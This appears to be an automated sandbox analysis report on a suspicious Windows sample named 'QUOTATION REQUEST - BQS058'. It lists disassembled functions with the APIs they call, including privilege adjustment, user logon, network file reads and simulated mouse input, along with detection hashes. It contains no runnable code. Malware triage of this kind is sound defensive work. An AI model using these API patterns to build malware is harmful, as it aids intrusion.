Function 0102E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0102E628

Strings

(, xrefs: 0102E66E
|, xrefs: 0102E658

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 640367b961b5d9d19fa6c2b3f3c3e937fbe8a309f051499bc1412419eb4995ad
Instruction ID: 7a426954a07be8b3c23d5eefe1e51b7272e14680edc472abda852abcaa74233d
Opcode Fuzzy Hash: 640367b961b5d9d19fa6c2b3f3c3e937fbe8a309f051499bc1412419eb4995ad
Instruction Fuzzy Hash: 44323775A407159FDB28CF19C4819AAB7F0FF48310B15C4AEE99ADB3A2D770E941CB40

Function 010422EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0104180A,00000000), ref: 010423E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01042418

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 38af0992d17e9226f017ed9f31a17a361d5794596b82c83021508f7575656cbe
Instruction ID: 1b926e4df9211b6123c73aa1bc108d10282c6c500749f192addf23d1045ab83a
Opcode Fuzzy Hash: 38af0992d17e9226f017ed9f31a17a361d5794596b82c83021508f7575656cbe
Instruction Fuzzy Hash: DF41A4B1A04209BFEB109E99ECC5EBFB7FCEB80715F00807AF781A6141DAB59E419650

Function 0103B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0103B343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0103B39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0103B3EA

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 92977a4eb4a36396bf87323bf2e5f36c6e0ca1be3c359d5a1050c9ec6595bc5b
Instruction ID: bd6851435575aefeb1798e74af02ead1ba998216bc287b299cdc17219480ff68
Opcode Fuzzy Hash: 92977a4eb4a36396bf87323bf2e5f36c6e0ca1be3c359d5a1050c9ec6595bc5b
Instruction Fuzzy Hash: 64217135A00218EFCB00EFA5D880AEEFBB9FF49314F0480AAE945EB355CB359915DB51

Function 010287E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00FF0DB6: std::exception::exception.LIBCMT ref: 00FF0DEC
Part of subcall function 00FF0DB6: __CxxThrowException@8.LIBCMT ref: 00FF0E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0102882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01028858
GetLastError.KERNEL32 ref: 01028865

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 3a0151501f745614a9e313256c23b674290b1bcb6701021fe34931195591ba05
Instruction ID: ae7efa3b15e58490894ba9c3f0a02dff64789b7a8dd0a7c9daa7414e5b7f4ae1
Opcode Fuzzy Hash: 3a0151501f745614a9e313256c23b674290b1bcb6701021fe34931195591ba05
Instruction Fuzzy Hash: FB119DB2804305AFE728DFA4EC85D6BB7E8EB04310B24C52EF49583251EB74B8008B60

Function 0102874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01028774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0102878B
FreeSid.ADVAPI32(?), ref: 0102879B

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 869cebc9c2b70708988e5deb585543d9fd08b3e574cc763d93e97b9cabcdbc57
Instruction ID: 193928c3ba55e00c6ad6a3354ec87e548d77a6ebaea82b09abf02809f9a5a632
Opcode Fuzzy Hash: 869cebc9c2b70708988e5deb585543d9fd08b3e574cc763d93e97b9cabcdbc57
Instruction Fuzzy Hash: 7DF04F7591130DBFDF04DFF4DC89AAEBBBCEF08211F0044A9A901E2180D6795A148B50

Function 0103C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0103C6FB
FindClose.KERNEL32(00000000), ref: 0103C72B

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3584c64584beccf86aa8feb79cc1653401b312c50c892d206b445b3ca0fb4502
Instruction ID: a82dc891111c0640c7139f0f19b84f3ad69985c4154a6db42873b3062c1184f9
Opcode Fuzzy Hash: 3584c64584beccf86aa8feb79cc1653401b312c50c892d206b445b3ca0fb4502
Instruction Fuzzy Hash: B911A1726042009FDB10EF29C844A2EF7E9FF85320F04851EF9A9D7391DB74A801DB81

Function 0103A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,01049468,?,0105FB84,?), ref: 0103A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,01049468,?,0105FB84,?), ref: 0103A0A9

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: fa30562f63c4a4b97bed8206b36626f0fc243271dbddfa71a5f7d810a687952d
Instruction ID: 2f155e299cfed1dd6262fa1a1996a267f4283fcc5ebb015c777c378d81b6bf1b
Opcode Fuzzy Hash: fa30562f63c4a4b97bed8206b36626f0fc243271dbddfa71a5f7d810a687952d
Instruction Fuzzy Hash: 7AF0823520532EABDB21AEA4CC48FEA776DBF08361F008156F989D7181D6359540CBA1

Function 010281CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01028309), ref: 010281E0
CloseHandle.KERNEL32(?,?,01028309), ref: 010281F2

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 4838f732aad9f6c8ceb446b47f3fb9f692698c281955f5e089b59612a82fbab3
Instruction ID: 7e779a6b59f09d755479e4ed2ea6f5c196c8d0990543a32f18f3c493e6aea104
Opcode Fuzzy Hash: 4838f732aad9f6c8ceb446b47f3fb9f692698c281955f5e089b59612a82fbab3
Instruction Fuzzy Hash: BBE0E671011611AFF7252B64EC05D777BEDEF04310714C85DF99584475DB665C90DB10

Function 00FFA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FF8D57,?,?,?,00000001), ref: 00FFA15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FFA163

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 318e5d769ebef2fabf6f2dcf7acd6439551ce5aa07acfa46602aa1c59eb37445
Instruction ID: 9749f5e08931272b569c6de2ab0fafd139a1b32e9d08a42b93eb135f9ccc598e
Opcode Fuzzy Hash: 318e5d769ebef2fabf6f2dcf7acd6439551ce5aa07acfa46602aa1c59eb37445
Instruction Fuzzy Hash: EDB0923105430AABEB102F91E909B8A3F68EB44AA2F408010F64D84066CBEB54508B91

Function 00FFF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ea8ad4a3954974332cafbfdcc9f2ead1e904a0e7d10cf53e3b751076275b8e2
Instruction ID: 180e4b29c517d128d659c7a0230612a5f79b0f1d89206e04b541820dc1e80c48
Opcode Fuzzy Hash: 4ea8ad4a3954974332cafbfdcc9f2ead1e904a0e7d10cf53e3b751076275b8e2
Instruction Fuzzy Hash: A932F032D29F054DD7339534C872336A248AFB73D8F15D737E95AB5ABAEB2984835200

Function 0100242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfbfc5897fc5a961a4f6d83b3553d1658f836966d79ee44531c5b5a9f9bb8f73
Instruction ID: 6b99ee05ea5452482335d5ddc54ad36a382d71d72f00c0d8821559431f76c55c
Opcode Fuzzy Hash: cfbfc5897fc5a961a4f6d83b3553d1658f836966d79ee44531c5b5a9f9bb8f73
Instruction Fuzzy Hash: 94B12330E2AF508DD323A6398835336B64CAFBB2C5F51D71BFC9675D66EB2681834240

Function 01038889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0103889B

Part of subcall function 00FF520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01038F6E,00000000,?,?,?,?,0103911F,00000000,?), ref: 00FF5213
Part of subcall function 00FF520A: __aulldiv.LIBCMT ref: 00FF5233

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: e93233c2c3a5f35b62692009e0af8d1e44d58cdf04d06fc933b28244144c8a74
Instruction ID: 6606e7ebb0c05823cdfc2393c175be00bca654c33767bd9cd54e916a25009ce1
Opcode Fuzzy Hash: e93233c2c3a5f35b62692009e0af8d1e44d58cdf04d06fc933b28244144c8a74
Instruction Fuzzy Hash: C721AF72625610CBC729CF29E451A52B3E5EFA5311F288FADE1F5CB2C0CA39A905CB54

Function 01034C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 01034C4A

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: df4d2e6c4cbb2d744c5291c5a6fab7ffed33f9253cdd777b318ed2779518dabc
Instruction ID: 68018834b9c42555b6009b95b05c614085aefe23b8c69ad3b3726aa061aeb829
Opcode Fuzzy Hash: df4d2e6c4cbb2d744c5291c5a6fab7ffed33f9253cdd777b318ed2779518dabc
Instruction Fuzzy Hash: 91D017A517420E68F9EC0A259A2FF7A15CCE380686FC081896281CE1C1A88858408130

Function 010287B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,01028389), ref: 010287D1

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 740e41591f62da0644e4ef90406150f6272cce94cc47cdbc3925aab39d1fecff
Instruction ID: eb3a0d6d38a6bc8177134d370b3a6fe214c429ece50c9e88f88ae1a16ebb245c
Opcode Fuzzy Hash: 740e41591f62da0644e4ef90406150f6272cce94cc47cdbc3925aab39d1fecff
Instruction Fuzzy Hash: DED05E3226060EABEF018EA4DC01EAF3B69EB04B01F408111FE15C5090C77AD835AF60

Function 00FFA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FFA12A

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 16a270f6e82e4bb2e7110b903f30630ef18944159b32d8b186cc9b585f24308a
Instruction ID: 3cd324821c728bfacab9b952046202fdaab9eac246179859342eedec31b16944
Opcode Fuzzy Hash: 16a270f6e82e4bb2e7110b903f30630ef18944159b32d8b186cc9b585f24308a
Instruction Fuzzy Hash: 12A0113000020EAB8B002E82E80888ABFACEA002A0B008020F80C800228BBBA8208A80

Function 00FE8808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39ce2fee2afebd5557fbec474e87175a3559582bea3f9286cf8e6ac4bc8cdb3c
Instruction ID: bde707faa119f550a56ace1136f8282c6df34c257fcc07c5bcfdb4de4c507c8c
Opcode Fuzzy Hash: 39ce2fee2afebd5557fbec474e87175a3559582bea3f9286cf8e6ac4bc8cdb3c
Instruction Fuzzy Hash: 1D223A30D041E69BDF38AE1AC8947BC77A1FB01794F288076D9CACB592DB789D82D741

Function 00FF21C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 828f84964bb3b5388eb9a8c734729e380799cbd3d0ba8f312089bd15ff522b42
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 3EC1A7326050974ADF6D863AC47413EFBA16EA27B131E075DD9B3CF1E5EE20C925E620

Function 00FF25FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: fc1163076a6476605917c1afcce2277d59f689cf10d4f9359c0322cb5443d29e
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: C3C1A2336051974ADF6D463AC47413EFAA16EA27B131A076ED5B3DB1E4EE20C924F620

Function 00FF1978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 6909636390c0c3d751931dee37ee810d870c1e821266399ea3afbb09d6ccd4f9
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 15C1A33260519789DF2D463AC47413EFBB17EA27B131A076DD5B3DB2E4EE20C925E620

Function 015FB9D8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096794282.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15f8000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 17f0fb8c9e1e2509a035b710b3c187c728ec93621a90792968dde8663f8de529
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: AD41D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80

Function 015FB8C8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096794282.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15f8000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
